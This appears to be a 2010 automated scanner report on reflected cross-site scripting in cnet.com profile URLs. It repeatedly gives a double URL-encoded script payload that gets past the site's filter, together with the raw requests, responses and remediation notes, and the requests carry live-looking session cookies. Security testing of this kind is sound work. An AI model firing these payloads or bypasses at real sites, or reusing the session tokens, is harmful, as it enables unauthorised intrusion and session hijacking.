Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Length: 31034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<li>jenguevina8ade<script>alert(1)</script>688f5566abe's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1edb0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eab7a805cdda was submitted in the REST URL parameter 2. This input was echoed as 1edb0"><script>alert(1)</script>ab7a805cdda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jenguevin1edb0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eab7a805cdda/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:25 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:25 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=867
Connection: Keep-Alive
Content-Length: 31037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<input type="hidden" name="profileName" value="jenguevin1edb0"><script>alert(1)</script>ab7a805cdda"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14dbe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57e94eac02b was submitted in the REST URL parameter 2. This input was echoed as 14dbe"><script>alert(1)</script>57e94eac02b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jim+kerstetter14dbe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57e94eac02b/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:14 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:14 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 31363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="jim kerstetter14dbe"><script>alert(1)</script>57e94eac02b"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0718%253cscript%253ealert%25281%2529%253c%252fscript%253efda29dad862 was submitted in the REST URL parameter 2. This input was echoed as e0718<script>alert(1)</script>fda29dad862 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jim+kerstettere0718%253cscript%253ealert%25281%2529%253c%252fscript%253efda29dad862/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:16 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:16 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=918
Connection: Keep-Alive
Content-Length: 31157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>jim kerstettere0718<script>alert(1)</script>fda29dad862's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aca00%253cscript%253ealert%25281%2529%253c%252fscript%253efe31d02e123 was submitted in the REST URL parameter 2. This input was echoed as aca00<script>alert(1)</script>fe31d02e123 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/joshua.goldmanaca00%253cscript%253ealert%25281%2529%253c%252fscript%253efe31d02e123/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:47 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:48 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=984
Connection: Keep-Alive
Content-Length: 31088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>joshua.goldmanaca00<script>alert(1)</script>fe31d02e123's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a21f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e717cbe0f1db was submitted in the REST URL parameter 2. This input was echoed as a21f9"><script>alert(1)</script>717cbe0f1db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/joshua.goldmana21f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e717cbe0f1db/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:46 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:46 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=978
Connection: Keep-Alive
Content-Length: 31138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="joshua.goldmana21f9"><script>alert(1)</script>717cbe0f1db"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 552a8%253cscript%253ealert%25281%2529%253c%252fscript%253ec0ea157668a was submitted in the REST URL parameter 2. This input was echoed as 552a8<script>alert(1)</script>c0ea157668a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jparker552a8%253cscript%253ealert%25281%2529%253c%252fscript%253ec0ea157668a/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:39 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:39 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=967
Connection: Keep-Alive
Content-Length: 31009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>jparker552a8<script>alert(1)</script>c0ea157668a's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe50c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebafdb7855cc was submitted in the REST URL parameter 2. This input was echoed as fe50c"><script>alert(1)</script>bafdb7855cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jparkerfe50c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebafdb7855cc/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:37 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:37 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 31116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="jparkerfe50c"><script>alert(1)</script>bafdb7855cc"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 529b4%253cscript%253ealert%25281%2529%253c%252fscript%253ed206b3971c9 was submitted in the REST URL parameter 2. This input was echoed as 529b4<script>alert(1)</script>d206b3971c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jpfalcone529b4%253cscript%253ealert%25281%2529%253c%252fscript%253ed206b3971c9/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:00 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:00 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=961
Connection: Keep-Alive
Content-Length: 31083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>jpfalcone529b4<script>alert(1)</script>d206b3971c9's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c13f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3243f818394 was submitted in the REST URL parameter 2. This input was echoed as c13f9"><script>alert(1)</script>3243f818394 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jpfalconec13f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3243f818394/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:11:58 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:11:59 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=992
Connection: Keep-Alive
Content-Length: 31135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="jpfalconec13f9"><script>alert(1)</script>3243f818394"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a93fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e733464cb51d was submitted in the REST URL parameter 2. This input was echoed as a93fe"><script>alert(1)</script>733464cb51d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/justin.yua93fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e733464cb51d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:11:08 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:11:08 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=997
Connection: Keep-Alive
Content-Length: 31106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="justin.yua93fe"><script>alert(1)</script>733464cb51d"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b9a3%253cscript%253ealert%25281%2529%253c%252fscript%253e735ec90bf97 was submitted in the REST URL parameter 2. This input was echoed as 6b9a3<script>alert(1)</script>735ec90bf97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/justin.yu6b9a3%253cscript%253ealert%25281%2529%253c%252fscript%253e735ec90bf97/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
